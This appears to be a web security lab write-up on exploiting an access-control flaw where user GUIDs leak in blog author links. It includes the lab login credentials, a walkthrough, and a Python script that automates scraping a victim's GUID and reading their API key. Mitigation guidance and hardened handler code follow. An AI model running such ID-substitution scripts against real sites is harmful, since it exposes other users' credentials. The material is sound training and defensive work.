Level 6: User ID controlled by request parameter, with unpredictable user IDs
Objective
Solve the lab by finding the GUID for the user carlos and submitting his API key as the solution.
Explanation
This lab contains a horizontal privilege escalation vulnerability where users are identified by GUIDs (Globally Unique Identifiers) rather than sequential, predictable user IDs. A GUID cannot realistically be guessed, but it does not have to be: the application exposes it elsewhere, for example in the links to user profiles on blog posts. Because the server accepts whatever GUID the request carries without checking that it belongs to the logged-in user, once the GUID for "carlos" is known you can view his account page and read his API key.
Resolution
Log in using the provided credentials:
wiener:peter
Navigate through the home page to find a post created by the user "carlos."
Once you find a post created by carlos, open the post and check the URL of the author link, which points at his user profile. It contains carlos's GUID, in the form
user?id=<GUID>
Copy that GUID. Then, still logged in as "wiener" (log in again with the credentials above if your session has expired), open your own account page and change the GUID in the URL from your own to the one belonging to carlos.
Once the page loads with carlos' account, locate the API key for the user "carlos."
Submit carlos' API key as the solution to complete the lab.
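The walkthrough above can be scripted. The following is an added example, not part of the lab or PortSwigger's own material: two offline extractors (one pulls a GUID out of the author link of a post, the other pulls the key out of the account page) plus a live runner. The lab base URL, the /login form with a hidden "csrf" field, the post URLs /post?postId=N, the account URL /my-account?id=<GUID> and the "Your API Key is:" wording are assumptions for the runner; the sample HTML is constructed for demonstration.

```python
import re
import sys
from typing import Optional

# 8-4-4-4-12 hex groups; generic GUID shape, not tied to the lab's values.
GUID_RE = r"[0-9a-fA-F]{8}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{12}"


def extract_user_guid(html: str, username: str) -> Optional[str]:
    """Return the GUID found in the href of the first link whose visible text is
    `username`, e.g. <a href="/user?id=<GUID>">carlos</a>; None if there is none."""
    link = re.compile(
        r'<a\b[^>]*\bhref="[^"]*?(' + GUID_RE + r')[^"]*"[^>]*>\s*'
        + re.escape(username) + r"\s*</a>",
        re.IGNORECASE,
    )
    m = link.search(html)
    return m.group(1) if m else None


def extract_api_key(html: str) -> Optional[str]:
    """Pull the key out of an account page. Assumed wording: 'Your API Key is: <key>'."""
    m = re.search(r"API Key is:\s*([A-Za-z0-9]+)", html, re.IGNORECASE)
    return m.group(1) if m else None


# Constructed sample pages (made-up GUID and key) so the extractors can be exercised offline.
SAMPLE_POST_HTML = (
    '<h1>Some post</h1><p>Posted by '
    '<a href="/user?id=3f2b0a1c-9d8e-4b7a-a6c5-1e2d3f4a5b6c">carlos</a></p>'
)
SAMPLE_ACCOUNT_HTML = (
    "<p>Your username is: carlos</p><p>Your API Key is: AbC123xyz</p>"
)


def main(lab: str, username: str, password: str, target: str) -> None:
    """Live run against a lab instance; every URL below is an assumption."""
    import requests  # imported here so the extractors stay importable without it

    s = requests.Session()
    login_page = s.get(f"{lab}/login").text
    csrf = re.search(r'name="csrf"\s+value="([^"]+)"', login_page)  # assumed hidden field
    if not csrf:
        raise SystemExit("login form did not contain the expected csrf field")
    s.post(f"{lab}/login", data={"csrf": csrf.group(1), "username": username, "password": password})

    # Walk the posts linked from the home page until one is authored by the target user.
    guid = None
    for post_id in range(1, 11):  # assumed: posts are numbered 1..10
        guid = extract_user_guid(s.get(f"{lab}/post?postId={post_id}").text, target)
        if guid:
            break
    if guid is None:
        raise SystemExit(f"no post by {target} found")

    # Substitute the discovered GUID for our own in the account URL (the IDOR itself).
    key = extract_api_key(s.get(f"{lab}/my-account?id={guid}").text)
    print(f"{target}: GUID={guid} API key={key}")


if __name__ == "__main__":
    if len(sys.argv) != 2:
        raise SystemExit("usage: python idor_guid.py https://<lab-id>.web-security-academy.net")
    main(sys.argv[1].rstrip("/"), "wiener", "peter", "carlos")
```

The regex for the author link is deliberately anchored on the visible username rather than on any GUID on the page, so a post page that also links to other users' profiles does not return the wrong identifier.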
Mitigation
Access Control: Enforce server-side authorization on every request that names an account: the server must check that the account being read or modified belongs to the logged-in user, regardless of what identifier the request carries.
Sensitive Information Handling: Do not rely on an identifier being hard to guess. A GUID in a URL is an acceptable lookup key, but it is not proof of authorization, because it can leak elsewhere in the application (here, in the author link on a blog post) and then be substituted by an attacker.
Session Management: Derive the acting user's identity from the server-side session, not from a URL parameter the client controls. If the id parameter is kept for the account page, reject any value that does not match the session user.
Unique Identifiers: Unpredictable IDs, or encrypted or signed tokens, raise the bar for guessing but do not replace the authorization check; treat them as defence in depth only.
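To make the mitigation concrete, here is an added example (not code from the lab) of the vulnerable account handler beside its hardened form, written framework-free so it runs stand-alone. The user store, GUIDs, API keys and the Request model are constructed for the demonstration; the session user ID is assumed to be set by a session layer from the cookie before the handler runs.

```python
from dataclasses import dataclass, field
from typing import Callable, Dict, List, Optional

# Constructed user store keyed by GUID (made-up values, not the lab's).
USERS: Dict[str, Dict[str, str]] = {
    "6b1c2d3e-4f50-4a61-b2c3-d4e5f6a7b8c9": {"username": "wiener", "api_key": "wienerKey000"},
    "3f2b0a1c-9d8e-4b7a-a6c5-1e2d3f4a5b6c": {"username": "carlos", "api_key": "carlosKey111"},
}
WIENER, CARLOS = list(USERS)  # the two GUIDs above, in order

AUDIT: List[str] = []  # denied cross-account requests, for detection


class Unauthorized(Exception):
    """No valid session."""


class Forbidden(Exception):
    """Authenticated, but not allowed to read this resource."""


@dataclass
class Request:
    session_user_id: Optional[str]                          # set server-side from the cookie
    params: Dict[str, str] = field(default_factory=dict)    # client-controlled query string


def account_vulnerable(req: Request) -> Dict[str, str]:
    """Lab-style handler: identity is taken from the client-supplied id parameter.
    Anyone who learns a GUID reads that account; unpredictability buys nothing here."""
    if req.session_user_id is None:
        raise Unauthorized()
    user = USERS.get(req.params.get("id", req.session_user_id))
    if user is None:
        raise KeyError("no such user")
    return user


def account_fixed(req: Request) -> Dict[str, str]:
    """Hardened handler: identity comes from the session. The id parameter, if present,
    may only name the caller's own account; a substituted GUID is refused and logged."""
    if req.session_user_id is None:
        raise Unauthorized()
    requested = req.params.get("id")
    if requested is not None and requested != req.session_user_id:
        AUDIT.append(f"IDOR attempt: session={req.session_user_id} requested={requested}")
        raise Forbidden()
    return USERS[req.session_user_id]


def outcome(handler: Callable[[Request], Dict[str, str]], req: Request) -> str:
    """Demonstration helper: 'ok:<username>' or the name of the exception raised."""
    try:
        return "ok:" + handler(req)["username"]
    except (Unauthorized, Forbidden, KeyError) as exc:
        return type(exc).__name__


if __name__ == "__main__":
    probe = Request(session_user_id=WIENER, params={"id": CARLOS})  # wiener substitutes carlos's GUID
    print("vulnerable:", outcome(account_vulnerable, probe))
    print("fixed:     ", outcome(account_fixed, probe))
    print("audit:     ", AUDIT)
```

The fixed handler keeps the id parameter only for compatibility; dropping it entirely and always reading the session user is simpler still. Logging the mismatch matters because a user presenting someone else's GUID is almost never a benign client bug, so the audit line is a cheap, high-signal detection.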